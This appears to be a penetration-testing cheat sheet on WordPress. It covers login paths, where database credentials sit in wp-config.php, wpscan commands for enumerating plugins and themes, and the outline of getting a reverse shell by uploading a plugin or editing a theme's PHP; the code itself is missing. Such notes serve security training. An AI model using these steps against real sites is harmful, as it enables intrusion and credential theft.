Wordpress
Main WordPress Files
Wordpress runs on PHP and MySQL.
Uploaded files go to: /wp-content/uploads/
Theme files go to: /wp-content/themes/
Plugin files go to /wp-content/plugins/
Core files go to: /wp-includes/
Default login paths:
/wp-login.php
/wp-login
/wp-admin/
/wp-admin.php
/login/
You can find the root password of the database in /wp-config.php/
There is multiple ways to get a shell using WordPress, without valid credentials we can see if we can exploit any plugins. The reason being, Plugins are community made, therefore they can be more insecure and not as frequently updated as the actual Wordpress software.
Scanning Wordpress:
By doing a searchsploit search of the plugins we can find vulnerable plugins that we can turn into Remote Code Execution.
Enumerating Themes and Plugins
Enumerate Plugins
To scan for plugins, run the following:
wpscan --url <URL> -e ap
Argument Key:
"-e" is for enumeration
"ap" is "all plugins
"vp" is vulnerable plugins
"p" is popular plugins
Tip: I recommend always using --plugins-detection mixed.
Enumeration of Themes
You can specify WPScan to check for themes only by using the following:
wpscan --url <URL> -e at
Operator Key:
"-e" flag is for enumeration
"t" is "popular themes"
"at" is "all themes"
"vt" is "vulnerable themes" only
Brute Forcing Wordpress:
Remote Code Execution through Plugins (Authenticated)
In the admin panel of wordpress one will be able to see that we can install a new plugin.
This python script will automatically generate a zip file in which we can install as a plugin and then navigating to it will result in a reverse shell.
Install the plugin.
Navigate to it.
We execute it and we get a reverse shell.
Malicious PHP injection
Simply navigate to a theme and edit the PHP file to execute a reverse shell as such:
Last updated